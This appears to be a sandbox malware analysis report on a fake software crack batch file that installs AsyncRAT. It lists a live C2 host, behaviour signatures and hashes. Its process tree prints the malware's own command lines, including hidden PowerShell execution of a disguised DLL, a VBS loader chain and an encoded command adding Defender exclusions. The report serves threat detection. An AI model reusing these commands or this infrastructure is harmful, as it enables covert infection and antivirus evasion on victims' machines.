Analysis

  • max time kernel
    91s
  • max time network
    96s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26/01/2025, 23:25

General

  • Target

    lossless scaling/Crack.bat

  • Size

    16KB

  • MD5

    1f5ea98d27f9d4dfe7da57a12ab5cfb7

  • SHA1

    2565fb81fe31c17562106ab046f9d8a8f1d0b3c5

  • SHA256

    9dba4747cdba2b31fbbcd2c30ef3c71d2e63ae01a8cd1765d385d065bafa21e5

  • SHA512

    3e35d5d4d2212376eeed7be09aaeb6ed200d644ef50122f586a51f130d027f3e54f7af9bd14ba184a0ffe4a13f4cb4dff9e5da776df24f7b710f665aece3dfe4

  • SSDEEP

    192:wA7T3nY6jgx4v7UHKtg+NS+7iASgon5ydpakLNfW9FATzSdcO7lgtVhwqgc8Z+Co:nya1TwSaerstRGj

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

C2

3x3.casacam.net:303

Mutex

MaterxMutex_Egypt2

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 4 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Crack.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4748
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4140
      • C:\Windows\system32\xcopy.exe
        xcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\\language\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I
        2⤵
          PID:4488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"
          2⤵
          • UAC bypass
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3764
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /query /tn administrator
            3⤵
              PID:3548
            • C:\Users\Public\IObitUnlocker\RAR.exe
              "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
              3⤵
              • Executes dropped EXE
              PID:1196
            • C:\Users\Public\IObitUnlocker\BR\Font.exe
              "C:\Users\Public\IObitUnlocker\BR\Font.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:396
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe
                "C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2816
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3256
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4444
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3060
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe"' & exit
                    6⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2408
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe"'
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2084
                      • C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe
                        "C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4500
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                    6⤵
                      PID:3712
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      6⤵
                        PID:2876
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        6⤵
                          PID:3476
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                          6⤵
                            PID:1072
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                            6⤵
                              PID:2284
                      • C:\Windows\system32\schtasks.exe
                        "C:\Windows\system32\schtasks.exe" /query /tn administrator
                        3⤵
                          PID:2932
                      • C:\Windows\system32\mode.com
                        mode con: cols=80 lines=10
                        2⤵
                          PID:2944
                      • C:\Windows\System32\rundll32.exe
                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                        1⤵
                          PID:2096
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA
                          1⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4180

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          3KB

                          MD5

                          2d83734c72d71baaccbb62283732230c

                          SHA1

                          044ec913a2f01ef4f742a8f4e6c72eb0b7a7e791

                          SHA256

                          eee2626e0fac98697432311487bf09b202f0c0464e79cefdfe26dcbacf267e73

                          SHA512

                          dc5763e18f50a62d68841bf9a8aafeba16284bf39baaac64b1ed11050869667124ca580fbe5435a6e0e8ffde81f77bac8d7c5a742fe5afcb598732cb49236d6c

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          3a141d5edc6567e3b56e1c9273f0076d

                          SHA1

                          ddf1618d06bbf7fe48bc69f4e2e862d2bfef54e4

                          SHA256

                          8f53305afb1216626d8d436deafa748a2fdb8065b0083f0a975fe26616bdd977

                          SHA512

                          fb411fdc79d7d62b6e7385c49968abeb6751006708ada7e1bdee4a25d7bdd487b78d4cd195093d5507214c836e17aada661a03a2aac2f66f2c630940c130e8ff

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          15KB

                          MD5

                          0ea2ab03545dfb9f0a4e42558c75ea15

                          SHA1

                          1b27bbe3dbea998f92002c4aa3396d93896f9000

                          SHA256

                          cc98f9185115b44448ab55c574acd0033acba9859f70d2b7b4d036f7927ecaa5

                          SHA512

                          8dfd8e812fadeaaccad4eeb261de3b69605837f063c4966b574d7b180b842e78190d1c2680a3a0f3573e9e8bd86a1c5771c195ac75e8f19d0ab9910bccfd92ca

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          b79a78d3bf286ebb83ad704dda679872

                          SHA1

                          6999ec126d252a7e6f2f50ed5dd1732d77ecf51c

                          SHA256

                          fbc9435c7c3e3c363338acd0ea97d18ae73f78417c52e316e07b1427b56b9bca

                          SHA512

                          c0830add5c2bd51529ffdb69825beffec9ecca260b0fe12b725ab9a37e17bdff6c1b2a53eac7ea672d0e061234d20c1a1cb1bddff670de942900dc1a52906922

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe

                          Filesize

                          156KB

                          MD5

                          6981d94fbcc31ca50551300f5b4a96a3

                          SHA1

                          e38b3a74f2951f5480fb67acc75d41f3e2b4f70e

                          SHA256

                          8c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811

                          SHA512

                          b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xwe3xk2q.t0u.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\jfmxvw.exe

                          Filesize

                          628KB

                          MD5

                          1d53f5a867dd69486834f81a7a490a2d

                          SHA1

                          4154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c

                          SHA256

                          f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1

                          SHA512

                          769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1

                        • C:\Users\Public\IObitUnlocker\BR\Font.exe

                          Filesize

                          434KB

                          MD5

                          68c9ee084cc409309b116ec6aea890a8

                          SHA1

                          efd6aab18a08a63b146ad587d1fa08e0bb19bebc

                          SHA256

                          ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d

                          SHA512

                          9809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25

                        • C:\Users\Public\IObitUnlocker\EN.dll

                          Filesize

                          181KB

                          MD5

                          a435e2fb659a3596b017f556b53fa09d

                          SHA1

                          c9ab6229bf239edac73593e0ffb53c1d9bb21686

                          SHA256

                          e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512

                          SHA512

                          aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495

                        • C:\Users\Public\IObitUnlocker\Loader.vbs

                          Filesize

                          308B

                          MD5

                          2993b76e0b0ba015caf654881638a0c0

                          SHA1

                          7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd

                          SHA256

                          0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3

                          SHA512

                          a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

                        • C:\Users\Public\IObitUnlocker\RAR.exe

                          Filesize

                          629KB

                          MD5

                          d3e9f98155c0faab869ccc74fb5e8a1e

                          SHA1

                          8e4feaad1d43306fdd8aa66efa443bca7afde710

                          SHA256

                          3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b

                          SHA512

                          2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

                        • C:\Users\Public\IObitUnlocker\Report.ps1

                          Filesize

                          457KB

                          MD5

                          dd3f962ccc2f5b5f34700307e35138f8

                          SHA1

                          90d80df0ef716260a7d4ed466cf40caf966f0969

                          SHA256

                          e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb

                          SHA512

                          619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae

                        • C:\Users\Public\IObitUnlocker\UK.dll

                          Filesize

                          5KB

                          MD5

                          3fffc04611766c3d49b9f0b74752a2b5

                          SHA1

                          c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5

                          SHA256

                          7537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d

                          SHA512

                          3ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8

                        • memory/396-63-0x00000000054E0000-0x00000000054EA000-memory.dmp

                          Filesize

                          40KB

                        • memory/396-48-0x0000000000910000-0x0000000000982000-memory.dmp

                          Filesize

                          456KB

                        • memory/396-49-0x0000000005430000-0x00000000054CC000-memory.dmp

                          Filesize

                          624KB

                        • memory/396-64-0x0000000005700000-0x0000000005756000-memory.dmp

                          Filesize

                          344KB

                        • memory/396-51-0x0000000005A80000-0x0000000006026000-memory.dmp

                          Filesize

                          5.6MB

                        • memory/396-60-0x0000000005570000-0x0000000005602000-memory.dmp

                          Filesize

                          584KB

                        • memory/2084-108-0x0000000006720000-0x000000000676C000-memory.dmp

                          Filesize

                          304KB

                        • memory/2084-93-0x0000000005230000-0x0000000005266000-memory.dmp

                          Filesize

                          216KB

                        • memory/2084-111-0x0000000007900000-0x0000000007922000-memory.dmp

                          Filesize

                          136KB

                        • memory/2084-110-0x0000000006BF0000-0x0000000006C0A000-memory.dmp

                          Filesize

                          104KB

                        • memory/2084-109-0x0000000006C60000-0x0000000006CF6000-memory.dmp

                          Filesize

                          600KB

                        • memory/2084-107-0x00000000066E0000-0x00000000066FE000-memory.dmp

                          Filesize

                          120KB

                        • memory/2084-105-0x0000000006280000-0x00000000065D7000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/2084-96-0x0000000006130000-0x0000000006196000-memory.dmp

                          Filesize

                          408KB

                        • memory/2084-95-0x0000000006090000-0x00000000060B2000-memory.dmp

                          Filesize

                          136KB

                        • memory/2084-94-0x00000000058C0000-0x0000000005EEA000-memory.dmp

                          Filesize

                          6.2MB

                        • memory/2816-80-0x0000000001A20000-0x0000000001A28000-memory.dmp

                          Filesize

                          32KB

                        • memory/2816-82-0x0000000001A80000-0x0000000001A86000-memory.dmp

                          Filesize

                          24KB

                        • memory/2816-77-0x000000001C990000-0x000000001CA36000-memory.dmp

                          Filesize

                          664KB

                        • memory/2816-78-0x000000001CF10000-0x000000001D3DE000-memory.dmp

                          Filesize

                          4.8MB

                        • memory/2816-79-0x000000001D480000-0x000000001D51C000-memory.dmp

                          Filesize

                          624KB

                        • memory/2816-81-0x000000001D620000-0x000000001D66C000-memory.dmp

                          Filesize

                          304KB

                        • memory/3060-91-0x00000000071B0000-0x00000000071CE000-memory.dmp

                          Filesize

                          120KB

                        • memory/3060-89-0x0000000007130000-0x00000000071A6000-memory.dmp

                          Filesize

                          472KB

                        • memory/3060-2725-0x00000000071E0000-0x00000000071EE000-memory.dmp

                          Filesize

                          56KB

                        • memory/3060-84-0x0000000000400000-0x0000000000416000-memory.dmp

                          Filesize

                          88KB

                        • memory/3060-90-0x00000000070C0000-0x00000000070CC000-memory.dmp

                          Filesize

                          48KB

                        • memory/3060-88-0x0000000006910000-0x0000000006976000-memory.dmp

                          Filesize

                          408KB

                        • memory/3764-18-0x00007FFE85A73000-0x00007FFE85A75000-memory.dmp

                          Filesize

                          8KB

                        • memory/3764-29-0x00007FFE85A70000-0x00007FFE86532000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3764-31-0x00007FFE85A70000-0x00007FFE86532000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3764-32-0x00007FFE85A70000-0x00007FFE86532000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3764-28-0x00007FFE85A70000-0x00007FFE86532000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/3764-27-0x0000015B899E0000-0x0000015B89A02000-memory.dmp

                          Filesize

                          136KB

                        • memory/3764-47-0x00007FFE85A70000-0x00007FFE86532000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4444-83-0x000002246AF70000-0x000002246AF7A000-memory.dmp

                          Filesize

                          40KB

                        • memory/4500-169-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-143-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-127-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-118-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-179-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-177-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-176-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-173-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-171-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-165-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-163-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-161-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-159-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-155-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-153-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-151-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-149-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-147-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-145-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-135-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-167-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-157-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-141-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-139-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-137-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-133-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-131-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-129-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-125-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-123-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-121-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-119-0x000001B5F77A0000-0x000001B5F7894000-memory.dmp

                          Filesize

                          976KB

                        • memory/4500-2722-0x000001B5DD610000-0x000001B5DD666000-memory.dmp

                          Filesize

                          344KB

                        • memory/4500-2723-0x000001B5DD670000-0x000001B5DD6BC000-memory.dmp

                          Filesize

                          304KB

                        • memory/4500-2724-0x000001B5DD6E0000-0x000001B5DD734000-memory.dmp

                          Filesize

                          336KB

                        • memory/4500-117-0x000001B5F77A0000-0x000001B5F7898000-memory.dmp

                          Filesize

                          992KB

                        • memory/4500-114-0x000001B5DD0A0000-0x000001B5DD142000-memory.dmp

                          Filesize

                          648KB